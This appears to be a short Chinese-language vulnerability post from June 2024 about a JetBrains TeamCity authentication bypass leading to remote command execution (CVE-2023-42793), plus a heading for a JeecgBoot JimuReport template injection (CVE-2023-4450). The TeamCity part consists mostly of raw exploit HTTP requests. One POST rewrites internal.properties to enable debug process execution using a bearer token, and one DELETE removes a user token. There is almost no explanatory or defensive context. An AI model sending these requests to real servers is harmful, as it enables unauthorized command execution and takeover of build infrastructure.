Close

30 6 月, 2024

(CVE-2023-42793)(CVE-2023-4450)

Jetbrains TeamCity 认证绕过导致远程命令执行漏洞(CVE-2023-42793)

POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1
Cache-Control: max-age=0
Content-Length: 2
Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.aldVV0JhS1pOeFNqOVdlY0h4MVhLOFZ1UVRn.ZTMxMDM0NzgtYWVjMC00MDM1LWEyZDgtMzA5MjI0YTdlMzJi
DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

JeecgBoot JimuReport 模板注入导致命令执行漏洞(CVE-2023-4450)